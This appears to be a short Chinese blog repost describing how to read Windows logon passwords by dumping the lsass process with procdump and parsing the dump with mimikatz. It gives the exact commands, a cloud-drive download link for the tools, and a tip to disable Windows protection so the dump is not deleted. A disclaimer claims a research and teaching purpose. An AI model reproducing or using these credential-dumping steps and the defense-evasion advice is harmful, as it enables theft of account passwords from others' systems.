今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。
工具我也都整理好了,
链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg
提取码:b1q6
procdump,可以将lsass进程的内存文件导出来;
mimikatz,可以对导出的内存文件进行分析,从而获取密码。
1,管理员权限打开cmd
procdump64.exe-accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件
2,管理员权限打开mimikatz.exe
执行privilege::debug;
3,管理员权限打开cmd
把lsass.dmp放在mimikatz目录利用
mimikatz.exe"sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswordsfull" exit
最后成功读取了密码:
需要注意的是,把windows系统的自动防护关了,不然电脑会把生成的内存文件自动删掉...
原文始发于微信公众号(Oriental rose):利用procdump+mimikatz读取密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论